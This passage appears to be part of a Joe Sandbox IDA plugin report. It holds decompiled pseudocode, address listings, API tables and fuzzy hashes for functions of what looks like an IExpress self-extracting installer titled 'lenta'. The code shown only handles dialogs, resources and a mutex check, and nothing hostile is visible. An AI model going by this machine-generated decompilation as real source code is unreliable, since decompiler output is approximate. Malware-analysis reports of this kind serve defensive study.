						if( *0xa091e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0xa09124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0xa09a3c, 0x3e8, 0xa08598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
                                                                                                                                                                                                                                            						_t38 = E00A04224(_t64, _t46, _t46);
                                                                                                                                                                                                                                            						__eflags = _t38;
                                                                                                                                                                                                                                            						if(_t38 == 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa087a0);
                                                                                                                                                                                                                                            						__eflags = _t39;
                                                                                                                                                                                                                                            						if(_t39 != 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t63 = 0x4c0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						E00A044B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L38;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = 0x4b1;
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                            0x00a03323
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03329
                                                                                                                                                                                                                                            0x00a0332b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0332b
                                                                                                                                                                                                                                            0x00a0324c
                                                                                                                                                                                                                                            0x00a0324c
                                                                                                                                                                                                                                            0x00a0324f
                                                                                                                                                                                                                                            0x00a032c8
                                                                                                                                                                                                                                            0x00a032ce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a032ce
                                                                                                                                                                                                                                            0x00a03251
                                                                                                                                                                                                                                            0x00a03256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03271
                                                                                                                                                                                                                                            0x00a03277
                                                                                                                                                                                                                                            0x00a03279
                                                                                                                                                                                                                                            0x00a03298
                                                                                                                                                                                                                                            0x00a0329d
                                                                                                                                                                                                                                            0x00a0329f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a032b0
                                                                                                                                                                                                                                            0x00a032b6
                                                                                                                                                                                                                                            0x00a032b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a032be
                                                                                                                                                                                                                                            0x00a03280
                                                                                                                                                                                                                                            0x00a03289
                                                                                                                                                                                                                                            0x00a0328e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0328e
                                                                                                                                                                                                                                            0x00a0327b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0327b
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000003E8,00A08598,00000200), ref: 00A03271
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A033E2
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A033F7
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A03410
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000836), ref: 00A03426
                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000), ref: 00A0342D
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A0343F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lenta
                                                                                                                                                                                                                                            • API String ID: 2418873061-7669773
                                                                                                                                                                                                                                            • Opcode ID: 1a09ebf679646a72abe6f9ddafe35c43459868b8c2f793263fe39c21a45c3cb0
                                                                                                                                                                                                                                            • Instruction ID: b12d4944085488c943d0f3f19168968969d4340f787c3fa000fe9973212859a7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a09ebf679646a72abe6f9ddafe35c43459868b8c2f793263fe39c21a45c3cb0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88514A7234034C7BEF219B757CCCFBB295DEB9AB55F104128F2469A1D1CAB58A039262
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A02CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				struct HRSRC__* _t31;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t13 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                            				_t65 = 0;
                                                                                                                                                                                                                                            				_t66 = __ecx;
                                                                                                                                                                                                                                            				_t48 = __edx;
                                                                                                                                                                                                                                            				 *0xa09a3c = __ecx;
                                                                                                                                                                                                                                            				memset(0xa09140, 0, 0x8fc);
                                                                                                                                                                                                                                            				memset(0xa08a20, 0, 0x32c);
                                                                                                                                                                                                                                            				memset(0xa088c0, 0, 0x104);
                                                                                                                                                                                                                                            				 *0xa093ec = 1;
                                                                                                                                                                                                                                            				_t20 = E00A0468F("TITLE", 0xa09154, 0x7f);
                                                                                                                                                                                                                                            				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                            					_t64 = 0x4b1;
                                                                                                                                                                                                                                            					goto L32;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                            					 *0xa0858c = _t27;
                                                                                                                                                                                                                                            					SetEvent(_t27);
                                                                                                                                                                                                                                            					_t64 = 0xa09a34;
                                                                                                                                                                                                                                            					if(E00A0468F("EXTRACTOPT", 0xa09a34, 4) != 0) {
                                                                                                                                                                                                                                            						if(( *0xa09a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                            							 *0xa09120 =  *0xa09120 & _t65;
                                                                                                                                                                                                                                            							if(E00A05C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                            								if( *0xa08a3a == 0) {
                                                                                                                                                                                                                                            									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                            									if(_t31 != 0) {
                                                                                                                                                                                                                                            										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0xa08184 != 0) {
                                                                                                                                                                                                                                            										__imp__#17();
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0xa08a24 == 0) {
                                                                                                                                                                                                                                            										_t57 = _t65;
                                                                                                                                                                                                                                            										if(E00A036EE(_t65) == 0) {
                                                                                                                                                                                                                                            											goto L33;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t33 =  *0xa09a40; // 0x3
                                                                                                                                                                                                                                            											_t48 = 1;
                                                                                                                                                                                                                                            											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                            												if(( *0xa09a34 & 0x00000100) == 0 || ( *0xa08a38 & 0x00000001) != 0 || E00A018A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t64 = 0x7d6;
                                                                                                                                                                                                                                            													if(E00A06517(_t57, 0x7d6, _t34, E00A019E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                            														goto L33;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												L30:
                                                                                                                                                                                                                                            												_t23 = _t48;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t23 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A02390(0xa08a3a);
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t64 = 0x520;
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								E00A044B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 =  &_v268;
                                                                                                                                                                                                                                            							if(E00A0468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            								goto L3;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                            								 *0xa08588 = _t43;
                                                                                                                                                                                                                                            								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(( *0xa09a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                            										_t64 = 0x524;
                                                                                                                                                                                                                                            										if(E00A044B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                            											goto L12;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L11;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t64 = 0x54b;
                                                                                                                                                                                                                                            										E00A044B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                            										L11:
                                                                                                                                                                                                                                            										CloseHandle( *0xa08588);
                                                                                                                                                                                                                                            										 *0xa09124 = 0x800700b7;
                                                                                                                                                                                                                                            										goto L33;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t64 = 0x4b1;
                                                                                                                                                                                                                                            						E00A044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						 *0xa09124 = 0x80070714;
                                                                                                                                                                                                                                            						L33:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00a02eef
                                                                                                                                                                                                                                            0x00a02eef
                                                                                                                                                                                                                                            0x00a02eef
                                                                                                                                                                                                                                            0x00a02ea2
                                                                                                                                                                                                                                            0x00a02e86
                                                                                                                                                                                                                                            0x00a02e88
                                                                                                                                                                                                                                            0x00a02e88
                                                                                                                                                                                                                                            0x00a02e43
                                                                                                                                                                                                                                            0x00a02e48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02e48
                                                                                                                                                                                                                                            0x00a02e30
                                                                                                                                                                                                                                            0x00a02e30
                                                                                                                                                                                                                                            0x00a02ef8
                                                                                                                                                                                                                                            0x00a02f01
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02f01
                                                                                                                                                                                                                                            0x00a02d8a
                                                                                                                                                                                                                                            0x00a02d8f
                                                                                                                                                                                                                                            0x00a02da1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02da3
                                                                                                                                                                                                                                            0x00a02dae
                                                                                                                                                                                                                                            0x00a02db4
                                                                                                                                                                                                                                            0x00a02dbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02dca
                                                                                                                                                                                                                                            0x00a02dd3
                                                                                                                                                                                                                                            0x00a02df5
                                                                                                                                                                                                                                            0x00a02e02
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02dd5
                                                                                                                                                                                                                                            0x00a02dde
                                                                                                                                                                                                                                            0x00a02de3
                                                                                                                                                                                                                                            0x00a02e04
                                                                                                                                                                                                                                            0x00a02e0a
                                                                                                                                                                                                                                            0x00a02e10
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02e10
                                                                                                                                                                                                                                            0x00a02dd3
                                                                                                                                                                                                                                            0x00a02dbb
                                                                                                                                                                                                                                            0x00a02da1
                                                                                                                                                                                                                                            0x00a02d5b
                                                                                                                                                                                                                                            0x00a02d5b
                                                                                                                                                                                                                                            0x00a02d5d
                                                                                                                                                                                                                                            0x00a02d69
                                                                                                                                                                                                                                            0x00a02d6e
                                                                                                                                                                                                                                            0x00a02f06
                                                                                                                                                                                                                                            0x00a02f06
                                                                                                                                                                                                                                            0x00a02f06
                                                                                                                                                                                                                                            0x00a02d59
                                                                                                                                                                                                                                            0x00a02f18

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A02CD9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A02CE9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A02CF9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A02D34
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A02D40
                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A02DAE
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A02DBD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A02E0A
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                            • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                            • Opcode ID: c2d057b42de9af2676781e0d4c9ee90b946f8001245789df04d0720e9b1779fc
                                                                                                                                                                                                                                            • Instruction ID: f1987a70d6f857a252aa805dcf9edbb261521d543ae8e9a944a15cfd5e930550
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2d057b42de9af2676781e0d4c9ee90b946f8001245789df04d0720e9b1779fc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A151E77078030DABE760EB64FD4EBBB2A98EB49740F004139F681D55E1DBB88C538715
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                                                                                            			E00A034F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t35;
                                                                                                                                                                                                                                            				struct HWND__* _t38;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t9 == 0) {
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					 *0xa091d8 = 1;
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                                            					L21:
                                                                                                                                                                                                                                            					EndDialog();
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				_pop(1);
                                                                                                                                                                                                                                            				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                            				if(_t12 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                            					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t35 = _a4;
                                                                                                                                                                                                                                            					 *0xa08584 = _t35;
                                                                                                                                                                                                                                            					E00A043D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                            					__eflags =  *0xa08184; // 0x1
                                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                            					_t17 = CreateThread(0, 0, E00A04FE0, 0, 0, 0xa08798);
                                                                                                                                                                                                                                            					 *0xa0879c = _t17;
                                                                                                                                                                                                                                            					__eflags = _t17;
                                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						E00A044B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t35);
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t23 = _t13 - 1;
                                                                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 2;
                                                                                                                                                                                                                                            					if(_a12 != 2) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					ResetEvent( *0xa0858c);
                                                                                                                                                                                                                                            					_t38 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            					_t25 = E00A044B9(_t38, 0x4b2, 0xa01140, 0, 0x20, 4);
                                                                                                                                                                                                                                            					__eflags = _t25 - 6;
                                                                                                                                                                                                                                            					if(_t25 == 6) {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						 *0xa091d8 = 1;
                                                                                                                                                                                                                                            						SetEvent( *0xa0858c);
                                                                                                                                                                                                                                            						_t39 =  *0xa0879c; // 0x0
                                                                                                                                                                                                                                            						E00A03680(_t39);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t25 - 1;
                                                                                                                                                                                                                                            					if(_t25 == 1) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetEvent( *0xa0858c);
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                            					TerminateThread( *0xa0879c, 0);
                                                                                                                                                                                                                                            					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a035b8
                                                                                                                                                                                                                                            0x00a03586
                                                                                                                                                                                                                                            0x00a03588
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03590
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03590
                                                                                                                                                                                                                                            0x00a03524
                                                                                                                                                                                                                                            0x00a03535
                                                                                                                                                                                                                                            0x00a03541
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03549
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 00A03535
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A03541
                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 00A0355F
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00A01140,00000000,00000020,00000004), ref: 00A03590
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A035C7
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00A035F1
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00A035F8
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00A03610
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00A03617
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A03623
                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 00A03637
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A03671
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                            • Opcode ID: 575fa89b37bcd16ad8f4806b05a9e2483ea7d8effbc4cb3a8a05d440241a69d1
                                                                                                                                                                                                                                            • Instruction ID: 00f995cc4a5c7295d3079e36c66622dcfae24e7942117097c07634cd9aa74b06
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 575fa89b37bcd16ad8f4806b05a9e2483ea7d8effbc4cb3a8a05d440241a69d1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7731C27224030DBBDB209FA5BC4DE6B3A6DE799B00F104629F742952F1CB769903CB55
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                            			E00A04224(char __ecx) {
                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				char* _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				char* _t61;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				char* _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                            				char _t76;
                                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t67 = __ecx;
